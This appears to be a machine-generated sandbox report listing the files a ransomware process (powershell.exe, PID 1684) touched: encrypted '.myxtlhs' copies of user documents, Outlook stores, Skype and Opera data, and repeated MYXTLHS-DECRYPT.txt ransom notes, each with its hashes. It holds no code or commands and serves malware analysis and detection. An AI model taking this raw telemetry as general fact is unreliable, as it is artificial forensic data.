MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Documents\thinkfields.rtf.myxtlhs
binary
MD5: f290d2e230ce8d32fb439f3191a592be
SHA256: 64d7139dac138afb89daff0e5b88c1385191d8c634cc087121cf5143d34b1b6b
1684
powershell.exe
C:\Users\admin\Documents\texasalready.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\thinkfields.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\summarystaff.rtf.myxtlhs
binary
MD5: 25db5bde876bf1de6905e8d09418f283
SHA256: f3eebe89a5131851447673bab2c7e93e821a1f3b960a0c93ed3731feca5ae1ec
1684
powershell.exe
C:\Users\admin\Documents\packagesdistrict.rtf.myxtlhs
binary
MD5: 972df3fdebeed1ca179e0e08bd9fe132
SHA256: bd43ba0110b5ce449525716e3c472916523c769721a57f590f73b8061fba6563
1684
powershell.exe
C:\Users\admin\Documents\passwordpoint.rtf.myxtlhs
binary
MD5: 07e9036efc419f7a1367e480e49902d5
SHA256: 23643f60eb6731582970432b8284ded59f7b8cf65f9b398dbb27e1c4c561eb0f
1684
powershell.exe
C:\Users\admin\Documents\passwordpoint.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\packagesdistrict.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\summarystaff.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.myxtlhs
binary
MD5: 12e2eb060f5b76d688dbf3a874e27caa
SHA256: cc4b779ad910463a4d0fe523e7d58dc70dede319b19e508aee9db9ed9fe17d2f
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.myxtlhs
binary
MD5: d7bff48b14a19bb4bf31cac0ef50e78a
SHA256: 785876f0430ffaaa0eb898fa950ba57f1f85f1784f78743f920ab24e57955ac8
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.myxtlhs
binary
MD5: 65caafe02ef162ff43ab14208284114f
SHA256: 35379dee397eaddc7b78d4f7f342b96f4999b6b8093ff1e367c22af56ec3a2d4
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: d56f1851182eb38d6115e6b07d2bd577
SHA256: 794b8e09c669d733b060510754cf7873fa95e70afb4fc6f0382e765ea65e7aad
1684
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.myxtlhs
binary
MD5: 23ad8ce875265f4f168bcb0d84c38cf3
SHA256: c126a0bc2d5b4875fadfcc0c4b5edabcea02e9209796c5a061c1d0636e6029a9
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.myxtlhs
binary
MD5: 2f2dbb3cef9eaf0f7047fe3a21817d5a
SHA256: cfc78665de38229dea1d53a42c874bb1ff0dc30746a3c36bb2f075d058bcdf43
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.myxtlhs
binary
MD5: 630d34204e84c91f88b6b86cea8cb181
SHA256: e54bf01d2c59b0c8e79b1f98416b7a864572ffb6a0edba7a7c5dabdeab5c3c97
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\majorshow.rtf.myxtlhs
binary
MD5: 739c795f9d3e009bc940144a9042e3d6
SHA256: 0145d66138fd44c28b58d80f0c319480b6cdf9c67172ca14f5e0a036c163d42e
1684
powershell.exe
C:\Users\admin\Pictures\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Videos\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Music\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Documents\majorshow.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Documents\fashionpurposes.rtf.myxtlhs
binary
MD5: c6a27aa2e43c75cc6e41b282a6d83736
SHA256: ddb4b28cd85c3e4edf6e4ea21f17e18626ff671005a8793e5cfe510277b08747
1684
powershell.exe
C:\Users\admin\Documents\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Desktop\subjectsreleases.png.myxtlhs
binary
MD5: c4f9f73378558b600ec5f786389cd2a3
SHA256: 5e94087601b562abf222faf77954989962542f1a7295e43a9453a777174e8ce3
1684
powershell.exe
C:\Users\admin\Desktop\thereforereported.jpg.myxtlhs
binary
MD5: 172041b714ba67a44543b1ae46742b6c
SHA256: 56a02b0160359ce7a118338f92421771c504cd032e7e2c571b74c5675a631ffb
1684
powershell.exe
C:\Users\admin\Documents\fashionpurposes.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\thereforereported.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\subjectsreleases.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\sexyunder.jpg.myxtlhs
binary
MD5: a24ffd7350afca9357e82592a1880ddf
SHA256: 443ec062f1d05a8acf787d7bcf18180754e1f374b28e5c3fa402e80092425c49
1684
powershell.exe
C:\Users\admin\Desktop\subjectsaustralia.png.myxtlhs
binary
MD5: 7eba0587db70c64ee31882cd644e09b4
SHA256: d0d5bfaf7a3188a068e7a7c65c84f5eed9081e6546373faaae4b0ce7c5d0a3ac
1684
powershell.exe
C:\Users\admin\Desktop\softwarevol.png.myxtlhs
binary
MD5: a2c71a5df91e57d9b552ec0c286aeb29
SHA256: d5f07f3a46626f2f5869f51bec54b62b0d3cc853fffdf7bf39eb9a78d988e0c3
1684
powershell.exe
C:\Users\admin\Desktop\sellerssession.rtf.myxtlhs
binary
MD5: 774222f67e663330ddc62fc6356c30ae
SHA256: 40c2c94b3dcc2b38ade368fefeed3e93aef2f68e3e4070e6c87026a6d782b766
1684
powershell.exe
C:\Users\admin\Desktop\subjectsaustralia.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\sexyunder.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\softwarevol.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\messagepeace.rtf.myxtlhs
binary
MD5: 37b0b0deb4f84e52c5e39d627d1b2afb
SHA256: 1c2c3bfff3815e816589d60569f8df8456cd988be66a3bb52e22552318dffdcd
1684
powershell.exe
C:\Users\admin\Desktop\poweredor.rtf.myxtlhs
binary
MD5: 9ed1b641f353d6e55b345354f8d4952c
SHA256: 84b001e2f698ed47c3f5d7bfb5c6e14f2653f96e2b23ac1ba8b8908e60131221
1684
powershell.exe
C:\Users\admin\Desktop\logolinks.rtf.myxtlhs
binary
MD5: 135417657124f805a9180f10eaf42528
SHA256: d8a3fcada6f66d038a7ca397af703e66736b007b40b241464b951d87e20eccb4
1684
powershell.exe
C:\Users\admin\Desktop\poweredor.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\logolinks.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\sellerssession.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\messagepeace.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\fundsstaff.rtf.myxtlhs
binary
MD5: 222c43b5a746c2fb354cc757f7bd5b6c
SHA256: 5c0f473cd728fc4adff96ddce8f758e318b569407831dad43e2fe513dde57674
1684
powershell.exe
C:\Users\admin\Desktop\donesales.png.myxtlhs
binary
MD5: 771641debe327064173b6b0085825c76
SHA256: e1f29ca42358e42f4161a60d9ee56af7fb8cddc596fac85f23018d1d54c6e952
1684
powershell.exe
C:\Users\admin\Desktop\fundsstaff.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\donesales.png
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Desktop\difficultworks.rtf.myxtlhs
binary
MD5: 61fd4b365b06f301226e83385a80cfc3
SHA256: 9c097c5c9620e4739a45d7329dfa24911077cfd581fa949c3a17e601d6f4fd6d
1684
powershell.exe
C:\Users\admin\Desktop\difficultworks.rtf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Desktop\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Desktop\answerolder.jpg.myxtlhs
binary
MD5: 623e38264da6e34ea7d8f1edf32a0ad7
SHA256: 055efc8ff2ca798927fa94c5ee9d92939ca9a268e33064571821305319f1e1a1
1684
powershell.exe
C:\Users\admin\Desktop\answerolder.jpg
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\Contacts\admin.contact.myxtlhs
binary
MD5: 9d389f1a8e830bfa8f566b1d84c55106
SHA256: 5e295c4dc05b91591c524b27c55508159b946975f2972b553fd0035424cb97c5
1684
powershell.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.myxtlhs
binary
MD5: 117b403dcf854005c82d4bc75ea9d919
SHA256: 1b4920c63fe1df06c3e3310654d03ebed7cb678c9254e3e1fb9e08fcb5516602
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\Contacts\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.myxtlhs
binary
MD5: 08012c4a72c0750470c06d5b2c942ed3
SHA256: d85f9819b04e7e64f87b810ca087f9be6ca66825862c0a66ebe400ecc9a3276a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.myxtlhs
binary
MD5: 28fd7529b1f86ea18496fc6f99206020
SHA256: 8fafe6bbae2d2a1d847a2a3e2fc234921234c5de63f714a9db1c6e010b9f399c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.myxtlhs
binary
MD5: 8057ab490c821f86f435d928d667c8c8
SHA256: 81d001070bd543a4ed5cc97f900c7b4ece4afef8a9606ed8325aaa077e82faac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.myxtlhs
binary
MD5: 65b6b1d58069f2e86b49ad1ce719e70e
SHA256: fe5f34c4948ef198cf73f30b1b71689f906284ca53d6800c95d8a15e2d3a7885
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.myxtlhs
binary
MD5: 5bff2e4b354ba9a300d3761c1c07d4a5
SHA256: 404cba179d903e313e03854e284f38a7ee06a48246dacef674c20623eb03d58d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.myxtlhs
binary
MD5: eaf0c117e36d85c0f6d621497f1507a4
SHA256: 603c021b29a9b34521cea680d2732d2f59b1afd879151977c060921402ad7ea8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.myxtlhs
gpg
MD5: 137b524b6e86be22333d5b11756f2c61
SHA256: d9563b31ac3c0b2f59388a0e5ef9c3eb1e04eb5aa034e17247f5ad331e7ad4a2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\logs\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.myxtlhs
binary
MD5: 74d4afb54e0c9b58e19c66c9b855360b
SHA256: 4768f3aa9ddf44b05d8006865f5ccafdfbc9d332ad94f9cf0962746959964fcf
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.myxtlhs
binary
MD5: 910a2c1bc88534f0f21a7803879db819
SHA256: c4a872eba98c0c8bf824ee9ce5c99bcb730cd9e5d72cba4258cf8048522869e5
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.myxtlhs
binary
MD5: 77928768672fcfb208b88b669437a5d7
SHA256: 8263246209bc22d7e703fdbce1d71f186b564ad41a022602ba8cef4656cc1330
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.myxtlhs
binary
MD5: a1798dc24a7b00bc985a9f733cbf27ad
SHA256: 2d10c70486882cae8b63a87d90b76c8c2a6a08143ec077447d1cbdf97f5694e8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.myxtlhs
binary
MD5: af79da22f8995d2dde293c394c33ecfc
SHA256: 7e078a4196ae89214c68b2b18b36906b96ead38ffdff527dcd05d37f195fbd8e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.myxtlhs
binary
MD5: f0dc2c8d5d02905dcb987c11f4411415
SHA256: 70c47a1e8139ee6b5df3259138ce0c2b153ef0c6343059d133de16f7634a81cf
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.myxtlhs
binary
MD5: 8e144305462402cc999d0728df19a633
SHA256: 95863bffca64fb6c6eb70020d7138d81ea09dab6996684fdbfe71ca220b53b72
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.myxtlhs
binary
MD5: 90ccaaaf9836f3247c41ac05ceb51d85
SHA256: a49d170b664634bf7212973548b06852aa857649e9c90f57706677dd3e6836a8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.myxtlhs
binary
MD5: 78e0f75b7e042fd81c8f8c6ab449dd5b
SHA256: d3a692e6e845baeff3d0fd4abb008ad37587dc2a44d90f64e2136196ec50ec57
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.myxtlhs
bc
MD5: 3392f5b427bfdc17820bf07136add93f
SHA256: 46accb021e3f1001d992c5afa54c367d8f6955db2a86abebc246c9c870867d4e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.myxtlhs
binary
MD5: f61d7027a3cc48d6ed5d3b84828b3a90
SHA256: ad462f775652aba01373d66b000f07fd767759b24d1117daf1307db9c73011e8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.myxtlhs
binary
MD5: 2f62e56059e9da3d371a0e0dac9415ed
SHA256: 7070b0277c8959434ddec1c94c827dc00cb1e6acf1091b104d8f9f04529f283a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.myxtlhs
binary
MD5: 69b2ce955d36d81c4fb08e6029eb2654
SHA256: c50b777959f6fa2664943437e078298383b2e4fe7583b4e8547920d612e9e460
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.myxtlhs
binary
MD5: e455079874564474166ed6e1793947f9
SHA256: bffba43eb7097cce0eb979aa1787686d225feef1db0dca1d2282b4c64538e2e1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.myxtlhs
binary
MD5: be762f9af2ba2083bf815e75fe00da3a
SHA256: 270fe2e1fd184990f3fc72f927eb4a164422be1035e2f4f5af032c29b098c7af
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.myxtlhs
binary
MD5: a13551c83591592dee9af74f8f1038f9
SHA256: 1c14b41ca321750e6dfab115dd606575588158c9bfc4a439d05f95b34cf9e616
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.myxtlhs
binary
MD5: 20bf9c6816329f3d5bf151f68e33e4fe
SHA256: 6894fed55bd73d0c751bbe9db0f08c9ca8025d8f909b915e9fc8a7b978451c8e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.myxtlhs
binary
MD5: ea0af722336bdfd106b5d8cf575a98f9
SHA256: 6853dd1ef70130ea9e4f8a20d2e508f074745e05cb697641b64362f137c94408
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.myxtlhs
binary
MD5: 83db6bae45f7a211b118520aa273a2c7
SHA256: f3dc2482e6dea06bfc56daed1851e2b75587950ed892d4bf87fbd99e26524444
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.myxtlhs
binary
MD5: c89fa797bd2c0992521c8b672ac76b67
SHA256: 3eca8783a0d8b6b7ff2a561a727a1eaadc34ce0e4f0002de55a100dfec51c088
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.myxtlhs
binary
MD5: a5273a982449ec0224b6173bc33b3121
SHA256: 4420c4e6788a4a4a5e5818d4bd20f6ff4983068b4aa53ca9c6e0c2b42d724061
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.myxtlhs
binary
MD5: 47cf7426474028e6d65afaa1e64c1608
SHA256: 82c000a84312cf6d56b653259afa09cb4265c4e8c5778036dc2de5fe06cf4549
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.myxtlhs
binary
MD5: 86869dd8d61fedc7943d9b02547bd1cb
SHA256: 64cb52a436dc2d39469cb5b3e9ff68d4edd47b253c79b944f0ccaa183c890e31
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.myxtlhs
binary
MD5: 4cf267becfa65f567739a453b4000c07
SHA256: fe5855b56b9fc318cce188b24004ec9fb60e453e4d3438e5ff7e704ac147f2bc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.myxtlhs
binary
MD5: 92a53e6dc91587799387314718b77c2d
SHA256: 5f9dbba83907dadcc0985c9458152fae2e47498a9c57bc10b549ea63aee86635
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.myxtlhs
binary
MD5: ca05f4179dce9b0368837fa8d18255ee
SHA256: f9a06970854412c749287c60f58039569f2babc65e5de3f8283df2ae7cfd2dab
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.myxtlhs
binary
MD5: e68855f84ea3abedfe64f1aec70e2e8b
SHA256: a5b73edff9ba0a49f1b5db03fd5674bf0f9d50b9fa827aea03402b12cb144544
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.myxtlhs
binary
MD5: b4a4c7fe8b855b81ec66a23b6a2092fa
SHA256: 7a5cb24fc46acaffdc1e138c3fa41873e2fbcc3ab03e38e05c51a7976731dc21
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
